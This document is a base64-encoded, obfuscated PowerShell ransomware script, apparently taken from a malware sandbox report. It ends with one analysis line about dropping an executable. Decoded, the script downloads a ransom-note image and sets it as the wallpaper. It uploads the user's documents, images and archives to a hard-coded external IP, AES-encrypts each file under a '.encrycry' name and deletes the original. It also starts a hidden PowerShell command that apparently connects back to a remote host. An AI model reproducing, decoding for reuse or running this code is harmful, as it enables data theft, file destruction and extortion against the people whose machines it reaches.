0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAB7AFQAYABlAE0AUAB9ACAAPQANAAoAQAAiACAADQAKACAAIAAgACAAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAgAA0ACgAgACAAIAAgAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAUABhAHIAYQBtAHMADQAKACAAIAAgACAAewAgAA0ACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBzAGUAcgAzADIALgBkAGwAbAAiACwAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBVAG4AaQBjAG8AZABlACkAXQAgAA0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AIAAoAEkAbgB0ADMAMgAgAHUAQQBjAHQAaQBvAG4ALAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB0ADMAMgAgAHUAUABhAHIAYQBtACwAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAcgBpAG4AZwAgAGwAcAB2AFAAYQByAGEAbQAsACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAMwAyACAAZgB1AFcAaQBuAEkAbgBpACkAOwANAAoAIAAgACAAIAB9AA0ACgAiAEAAIAANAAoAIAAgACAAIABBAGAARABkAGAALQB0AFkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHsAdABgAEUAbQBQAH0ADQAKAA0ACgAgACAAIAAgACQAewBzAHAAaQBfAHMAYABlAGAAVABkAGAARQBzAEsAVwBhAGAAbABsAFAAYQBQAEUAUgB9ACAAPQAgADAAeAAwADAAMQA0AA0ACgAgACAAIAAgACQAewB1AHAAZABgAEEAVABFAGAASQBOAEkAZgBgAGkAbABFAH0AIAA9ACAAMAB4ADAAMQANAAoAIAAgACAAIAAkAHsAcwBlAGAATgBEAGMASABhAGAATgBHAGUARQB2AGAAZQBgAE4AVAB9ACAAPQAgADAAeAAwADIADQAKACAAIAAgACAADQAKACAAIAAgACAAJAB7AGYAdwBgAGkATgBJAGAATgBJAH0AIAA9ACAAJAB7AFUAUABkAGEAYABUAEUAaQBgAE4AYABJAGYASQBsAGUAfQAgAC0AYgBvAHIAIAAkAHsAcwBlAGAATgBEAEMAYABIAEEATgBnAGUAZQB2AGAAZQBgAE4AdAB9AA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQAewByAGAARQBUAH0AIAA9ACAAWwBQAGEAcgBhAG0AcwBdADoAOgBTAHkAcwB0AGUAbQBQAGEAcgBhAG0AZQB0AGUAcgBzAEkAbgBmAG8AKAAkAHsAcwBwAGAAaQBfAHMAZQBgAFQAYABkAGAAZQBTAGsAdwBhAEwATABgAHAAYQBwAGAARQByAH0ALAAgADAALAAgACQAewBpAG0AQQBgAGcAZQB9ACwAIAAkAHsARgBXAGAAaQBgAE4AaQBOAGkAfQApAA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0ARQBuAGMAcgB5AGMAcgB5ACAAewANAAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ADQAKACAAIAAgACAAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBzAHQAcgBpAG4AZwBdACkAXQANAAoAIAAgACAAIABQAGEAcgBhAG0ADQAKACAAIAAgACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHsAdABSAGAAVQBFAH0AKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBrAGAARQB5AH0ALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB7AFQAUgBgAFUARQB9ACwAIABQAGEAcgBhAG0AZQB0AGUAcgBTAGUAdABOAGEAbQBlACAAPQAgACIAYwBSAFkAcABgAFQAZgBJAGAATABlACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAewBQAGAAQQBUAEgAfQANAAoAIAAgACAAIAApADsADQAKAA0ACgAgACAAIAAgAEIAZQBnAGkAbgAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAcwBgAGgAYABBAGAAbQBBAG4AYQBHAEUARAB9ACAAPQAgAG4ARQBXAC0AbwBgAEIAagBgAGUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFMASABBADIANQA2AE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAUwBgAE0AQQBuAEEARwBgAEUARAB9ACAAPQAgAG4AZQBXAGAALQBvAGAAQgBKAEUAQwBUACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAEUAcwBNAEEAbgBgAEEAZwBgAGUAZAB9AC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAYQBFAFMAbQBBAG4AYQBgAEcAYABlAEQAfQAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7AA0ACgAgACAAIAAgACAAIAAgACAAJAB7AEEAZQBgAHMAbQBgAEEAYABOAGEAZwBFAGQAfQAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsADQAKACAAIAAgACAAIAAgACAAIAAkAHsAQQBFAFMAYABNAEEAYABOAEEARwBlAEQAfQAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwANAAoAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBhAGUAcwBgAE0AQQBOAGAAQQBHAGAAZQBEAH0ALgBLAGUAeQAgAD0AIAAkAHsAcwBoAGEATQBgAEEAbgBgAEEAYABHAEUARAB9AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAewBrAGAAZQBZAH0AKQApADsADQAKACAAIAAgACAAIAAgACAAIAB0AHIAeQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBmAGAAaQBMAGUAfQAgAD0AIABnAEUAdAAtAGAASQBgAFQARQBNACAALQBQAGEAdABoACAAJAB7AHAAYQBgAFQAaAB9ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAUABMAGEAaQBgAE4AQgBgAHkAYABUAGUAUwB9ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJAB7AEYASQBgAGwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AG8AdQBgAFQAUABgAEEAVABoAH0AIAA9ACAAJAB7AGYASQBgAEwAZQB9AC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACgAJwAuAGUAJwArACcAbgBjAHIAeQBjAHIAeQAnACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AGUAbgBjAHIAYAB5AFAAdABgAG8AcgB9ACAAPQAgACQAewBBAEUAcwBgAE0AQQBuAEEAYABHAEUAZAB9AC4AQwByAGUAYQB0AGUARQBuAGMAcgB5AHAAdABvAHIAKAApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAewBlAG4AYABjAFIAWQBwAFQARQBgAGQAQgBgAFkAVABlAFMAfQAgAD0AIAAkAHsAZQBuAEMAcgB5AGAAcABgAFQAbwByAH0ALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJAB7AFAAYABsAEEASQBOAGIAYAB5AFQAZQBzAH0ALAAgADAALAAgACQAewBQAGAAbABgAEEAaQBuAGIAWQB0AEUAUwB9AC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAZQBOAGAAQwBgAFIAWQBgAFAAdABlAGAARABCAHkAdABFAHMAfQAgAD0AIAAkAHsAQQBFAHMAbQBhAG4AYABBAGAARwBgAGUARAB9AC4ASQBWACAAKwAgACQAewBFAGAATgBDAFIAYABZAFAAdABlAGQAYABCAFkAdABlAHMAfQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHsAYQBlAGAAUwBgAG0AQQBOAGAAQQBHAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAewBvAFUAVABgAFAAYQBgAFQASAB9ACwAIAAkAHsAZQBuAGAAQwBSAFkAUABUAGUAZABCAGAAeQBUAEUAcwB9ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABnAGAARQBgAFQALQBJAHQARQBtACAAJAB7AG8AVQB0AGAAcABhAHQAaAB9ACkALgBMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAAPQAgACQAewBGAGkAYABsAGUAfQAuAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoACcARgAnACsAJwBpAGwAZQAgACcAKwAnAGUAJwArACcAbgBjACcAKwAnAHIAeQBwAHQAZQBkACcAKwAnACAAJwArACcAdABvACcAKwAnACAAJwArACIAJABvAHUAdABQAGEAdABoACIAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAfQAgAEMAYQB0AGMAaAAgAHsAIAB9AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgAEUAbgBkACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAewBTAEgAQQBgAG0AYQBuAGEAZwBgAEUAZAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAewBBAGAARQBzAE0AYQBOAGAAQQBnAEUARAB9AC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJAB7AGQAbwBgAFcAbgBgAEwAbwBhAGAARABVAHIATAB9ACAAPQAgACgAJwBoACcAKwAnAHQAdAAnACsAJwBwADoALwAvADEANgAnACsAJwA4AC4AMQAnACsAJwA4ACcAKwAnADgALgAxADIANwAnACsAJwAuADIAJwArACcAMQA3ACcAKwAnAC8AbgBvACcAKwAnAHQAaQBjAGUALgBwAG4AZwAnACkADQAKACQAewBQAEEAYABUAGgAfQAgAD0AIAAoACQAewBFAE4AdgA6AGAAVABlAGAATQBwAH0AKQAgACsAIAAoACgAJwAzAEQAQgBuAG8AJwArACcAdABpAGMAZQAuACcAKwAnAHAAJwArACcAbgBnACcAKQAuAHIARQBQAEwAYQBDAGUAKAAoAFsAYwBIAEEAUgBdADUAMQArAFsAYwBIAEEAUgBdADYAOAArAFsAYwBIAEEAUgBdADYANgApACwAWwBTAFQAUgBpAG4ARwBdAFsAYwBIAEEAUgBdADkAMgApACkADQAKACgAbgBlAFcALQBvAGAAQgBqAEUAYABDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB7AEQATwBXAGAATgBMAG8AQQBkAGAAVQByAEwAfQAsACAAJAB7AFAAQQBgAFQAaAB9ACkADQAKAA0ACgBTAEUAVABgAC0AdwBhAGAAbABgAEwAUABBAHAAYABlAFIAIAAtAEkAbQBhAGcAZQAgACQAZQBuAHYAOgBUAEUATQBQACIAXABuAG8AdABpAGMAZQAuAHAAbgBnACIAIAAtAFMAdAB5AGwAZQAgAEYAaQB0AA0ACgANAAoAdwBoAGkAbABlACgAMQApACAAewANAAoAIAAgACAAIAAkAHsAQQB9ACAAPQAgAEcAZQBUAC0AYwBoAGkAbABgAGQAYABpAGAAVABlAE0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAC8AKgAgAC0ASQBuAGMAbAB1AGQAZQAgACoALgBwAG4AZwAsACAAKgAuAGcAaQBmACwAIAAqAC4AagBwAGcALAAgACoALgBqAHAAZQBnACwAIAAqAC4AYQBpACwAIAAqAC4AcABzAGQALAAgACoALgBjAHMAdgAsACAAKgAuAHgAbABzAHgALAAgACoALgBwAHAAdAB4ACwAIAAqAC4AcABkAGYALAAgACoALgBoAHcAcAAsACAAKgAuAGgAdwBwAHgALAAgACoALgB0AHgAdAAsACAAKgAuAGIAYQB0ACwAIAAqAC4AbABuAGsALAAgACoALgB6AGkAcAAsACAAKgAuADcAegAsACAAKgAuAHIAYQByACwAIAAqAC4AdAB4AHQAIAAtAFIAZQBjAHUAcgBzAGUAOwANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHsAQgB9ACAAaQBuACAAJAB7AEEAfQApACAAewANAAoAIAAgACAAIAAgACAAIAAgAFQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AFcAYwB9ACAAPQAgAE4AZQBgAFcALQBvAGAAQgBKAGAARQBDAFQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB7AHIAYABlAFMAfQAgAD0AIAAkAHsAVwBDAH0ALgBVAHAAbABvAGEAZABGAGkAbABlACgAKAAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AMwA0ACcAKwAnAC4ANgAnACsAJwA0AC4AJwArACcAMQA0ADMALgAzADQAOgAnACsAJwAzADAAMAAwACcAKQAsACAAJAB7AEIAfQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAYABOAGAAVgBgAE8ASwBlAGAALQBFAG4AYwByAHkAYwBSAHkAIAAtAEsAZQB5ACAAKAAnADkANgA0ADEARQA0ACcAKwAnADQAJwArACcAMAAzADUAQwAwADgAQQAxADQAJwArACcAMgAyACcAKwAnADYAOABGAEIAJwArACcARQA1AEEAQgAzADMARAAwAEQARgAnACkAIAAtAFAAYQB0AGgAIAAkAHsAQgB9ADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIARQBNAG8AVgBgAEUALQBJAGAAVABlAE0AIAAkAHsAYgB9ADsADQAKACAAIAAgACAAIAAgACAAIAB9ACAAQwBhAHQAYwBoACAAewAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABTAFQAYQBgAFIAVABgAC0AUABgAFIAbwBjAEUAcwBzACAAJABQAFMASABPAE0ARQBcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAoACcALQAnACsAJwBOAG8ARQB4AGkAdAAnACkALAAoACcALQB3AGkAbgBkAG8AJwArACcAdwBzAHQAeQBsAGUAJwArACcAIABoAGkAJwArACcAZAAnACsAJwBkACcAKwAnAGUAbgAnACkALAAoACcALQBFAG4AYwAgAEoAQQBCADAAQQBDACcAKwAnAEEAQQBQAFEAQQBnAEEAQwBjAEEAVwB3AEIARQBBAEcAdwBBAGIAQQBCAEoAQQBHADAAQQBjAEEAQgB2AEEASABJACcAKwAnAEEAZABBAEEAbwBBAEMASQBBAGQAUQBCAHoAJwArACcAQQBHAFUAQQBjAGcAQQB6AEEARABJAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAGkAQQBDAGsAQQBYAFEAQQBnAEEASABBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBDAEEAQQBjAHcAQgAwAEEARwBFAEEAZABBAEIAcABBAEcATQBBAEkAQQBCAGwAQQBIAGcAQQBkAEEAQgBsAEEASABJAEEAYgAnACsAJwBnAEEAZwBBAEcASQBBAGIAdwBCAHYAQQBHAHcAQQBJAEEAQgBUAEEARwBnAEEAYgB3AEIAMwBBAEYAYwBBAGEAUQBCAHUAQQBHAFEAQQBiAHcAQgAzAEEAQwBnAEEAYQBRAEIAdQBBAEgAUQBBAEkAQQBCAG8AQQBHACcAKwAnAEUAQQBiAGcAQgBrAEEARwAnACsAJwB3AEEAWgBRAEEAcwBBAEMAQQBBAGEAUQBCAHUAQQBIAFEAQQBJAEEAQgB6AEEASABRAEEAWQBRAEIAMABBAEcAVQBBAEsAUQBBADcAJwArACcAQQBDAGMAQQBEAFEAQQBLAEEARwBFAEEAWgBBAEIAawBBAEMAMABBAGQAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAYgBnAEIAaABBAEcAMAAnACsAJwBBAFoAUQBBAGcAQQBIAGMAQQBhAFEAQgB1AEEAQwBBAEEATABRAEIAdABBAEcAVQBBAGIAUQBCAGkAQQBHAFUAQQBjAGcAQQBnAEEAQwBRAEEAZABBAEEAZwBBAEMAMABBAGIAZwBCAGgAQQBHADAAQQBaAFEAQgB6AEEASABBAEEAJwArACcAWQBRAEIAagBBAEcAVQBBAEkAQQAnACsAJwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEATgBBAEEAbwBBAFcAdwBCAHUAQQBHAEUAQQBkAEEAQgBwAEEASABZAEEAWgBRAEEAdQBBAEgAYwBBAGEAUQBCAHUAQQBGADAAQQAnACsAJwBPAGcAQQA2AEEARgBNAEEAYQBBAEIAdgBBAEgAYwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEASwBBAEEAbwBBAEYAcwBBAFUAdwBCADUAQQBIAE0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIARQBBAEcAawBBAFkAUQBCAG4AQQAnACsAJwBHADQAQQBiAHcAQgB6AEEASABRACcAKwAnAEEAYQBRAEIAagBBAEgATQBBAEwAZwBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEYAMABBAE8AZwBBADYAQQBFAGMAQQBaAFEAQgAwAEEARQBNAEEAZABRAEIAeQBBAEgASQBBAFoAUQBCAHUAQQBIAFEAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAG8AQQBDAGsAQQBJAEEAQgA4AEEAQwBBAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAawBBAEwAZwBCAE4AQQBHAEUAJwArACcAQQBhAFEAQgB1AEEARgBjAEEAYQBRAEIAdQBBAEcAUQBBAGIAdwAnACsAJwBCADMAQQBFAGcAQQBZAFEAQgB1AEEARwBRAEEAYgBBAEIAbABBAEMAdwBBAEkAQQBBAHcAQQBDAGsAQQBEAFEAQQBLAEEAQQAwAEEAQwBnAEEAawBBAEcATQBBAGIAQQBCAHAAQQBHAFUAQQBiAGcAQgAnACsAJwAwAEEAQwBBAEEAUABRAEEAZwBBAEUANABBAFoAUQBCADMAQQAnACsAJwBDADAAQQAnACsAJwBUAHcAQgBpAEEARwBvAEEAWgBRAEIAagBBAEgAUQBBAEkAJwArACcAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUANABBAFoAUQBCADAAQQBDADQAQQBVAHcAQgB2AEEARwBNAEEAYQB3AEIAJwArACcAbABBAEgAUQBBAGMAdwBBAHUAQQBGAFEAQQBRAHcAQgAnACsAJwBRAEEARQBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDAGcAQQAnACsAJwBJAGcAQQB6AEEARABRAEEATABnAEEAeABBACcAKwAnAEQASQBBAE0AdwBBAHUAQQBEAEUAQQBOACcAKwAnAGcAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAawBBAEkAZwBBAHMAQQBDAEEAQQBPAEEAQQB3AEEAQwBrAEEATwB3AEEATgBBAEEAbwBBAEoAJwArACcAQQBCAHoAJwArACcAQQAnACsAJwBIAFEAQQBjAGcAQgBsAEEARwBFAEEAYgBRAEEAZwBBAEQAMABBAEkAQQBBAGsAQQBHAE0AQQBiAEEAQgBwAEEARwBVAEEAYgBnAEIAMABBAEMANABBAFIAdwBCAGwAQQBIAFEAQQBVAHcAQgAwAEEASABJAEEAWgBRAEIAaABBAEcAMABBAEsAQQBBAHAAQQBEAHMAQQBEAFEAQQBLAEEAQQAwAEEAJwArACcAQwBnAEIAYgBBAEcASQBBAGUAUQBCADAAQQBHAFUAQQBXAHcAQgBkAEEARgAwAEEASgBBACcAKwAnAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBIAE0AQQBJACcAKwAnAEEAQQA5AEEAJwArACcAQwBBAEEATQBBAEEAdQAnACsAJwBBAEMANABBAE4AZwBBADEAQQBEAFUAQQBNAHcAQQAxAEEASAB3AEEASgBRAEIANwBBAEQAQQBBAGYAUQBBADcAQQBBADAAQQBDAGcAQgAzAEEARwBnAEEAYQBRAEIAcwBBAEcAVQBBAEsAQQBBAG8AQQBDAFEAQQBhAFEAQQBnAEEARAAwAEEASQBBAEEAawBBAEgATQBBAGQAQQBCAHkAQQBHAFUAQQBZAFEAQgB0AEEAQwA0AEEAVQBnAEIAbABBAEcARQBBAFoAQQBBAG8AQQBDAFEAQQAnACsAJwBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwAnACsAJwBBAEkAQQBBAHcAQQBDAHcAQQBJAEEAQQBrAEEARwBJAEEAZQBRAEIAMABBAEcAVQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAawBBAEsAUQBBAGcAQQBDADAAQQBiAGcAQgBsAEEAQwBBAEEAJwArACcATQBBAEEAcABBAEMAQQBBAGUAdwBBAE4AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAawBBAEcAUQBBAFkAUQBCADAAQQBHAEUAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwAnACsAJwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAEwAUQBCAFUAQQBIAGsAQQBjAEEAQgBsAEEARQA0AEEAWQBRAEIAdABBAEcAVQBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYAUQBBAFoAUQBCADQAQQBIAFEAQQBMAGcAQgBCAEEARgBNAEEAUQAnACsAJwB3AEIASgBBAEUAawBBAFIAUQBCACcAKwAnAHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEMAawBBAEwAZwBCAEgAQQBHAFUAQQBkAEEAQgBUAEEASABRAEEAYwBnAEIAcABBAEcANAAnACsAJwBBAFoAdwBBAG8AQQBDAFEAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwBBAE0AQQBBACcAKwAnAHMAQQBDAEEAQQBKAEEAQgBwAEEAQwBrAEEATwB3AEEATgBBAEEAbwBBACcAKwAnAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBrAEEASABNAEEAWgBRAEIAdQBBAEcAUQBBAFkAZwBCAGgAQQBHAE0AQQBhAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEcAawBBAFoAUQBCADQAQQBDAEEAQQBKAEEAQgAnACsAJwBrAEEARwBFAEEAZABBAEIAaABBAEMAQQBBAE0AZwBBACsAQQBDAFkAQQBNAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQAnACsAJwBBAGQAQQBBAHQAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEMAQQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCAGwAJwArACcAQQBHADQAQQBaAEEAQgBpAEEARwBFAEEAWQB3AEIAcgBBAEQASQBBAEkAQQBBADkAQQBDAEEAQQBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBJAEEAQQByAEEAQwBBAEEASQBnAEIAUQBBAEYATQBBAEkAQQBBAGkAQQBDAEEAQQAnACsAJwBLAHcAQQBnAEEAQwBnAEEAYwBBAEIAMwBBAEcAUQBBAEsAUQBBAHUAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAcgBBAEMAQQBBAEkAZwBBACsAQQBDAEEAJwArACcAQQBJAGcAQQA3AEEAQQAwAEEAQwBnAEEAZwBBAEMAQQBBAEkAQQBBAGcAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDAEEAQQBQAFEAQQBnAEEAQwBnAEEAVwB3AEIAMABBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBaAFEAQgB1AEEARwBNAEEAYgB3AEIAawBBAEcAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQAnACsAJwA2ACcAKwAnAEEARQBFACcAKwAnAEEAVQB3AEIARAAnACsAJwBBAEUAawBBAFMAUQBBAHAAJwArACcAQQBDADQAJwArACcAQQBSAHcAJwArACcAQgBsAEEASABRAEEAUQBnAEIANQBBAEgAUQBBAFoAUQBCAHoAQQBDAGcAQQAnACsAJwBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawAnACsAJwBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBNAGcAQQBwAEEARABzAEEARABRAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKACcAKwAnAEEAQgB6AEEASABRAEEAYwBnAEIAbABBAEcARQBBAGIAUQAnACsAJwBBAHUAQQBGAGMAQQBjAGcAQgBwAEEASABRAEEAWgBRAEEAbwBBAEMAUQBBAGMAdwBCAGwAQQBHADQAQQBaAEEAQgBpAEEASABrAEEAJwArACcAZABBAEIAbABBAEMAdwBBAE0AQQBBAHMAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDADQAJwArACcAQQBUAEEAQgBsAEEARwA0AEEAWgB3AEIAMABBAEcAZwBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCADAAQQBIAEkAJwArACcAQQBaAFEAQgBoAEEARwAwAEEATABnAEIARwBBAEcAdwBBAGQAUQBCAHoAQQBHAGcAQQBLAEEAQQBwAEEAQQAnACsAJwAwAEEAQwBnAEIAOQBBAEQAcwBBAEQAUQAnACsAJwBBAEsAJwArACcAQQBBADAAQQBDAGcAQQBrAEEARwBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBRAHcAQgBzAEEARwA4AEEAYwB3AEIAbABBAEMAZwBBAEsAUQBBAD0AJwApADsADQAKACAAIAAgACAAcwBgAFQAYABBAHIAYABUAC0AcwBMAEUARQBQACAALQBTAGUAYwBvAG4AZABzACAANgAwADAALgAwADsADQAKAH0A

Drops an executable to the user AppData folder (2 events)

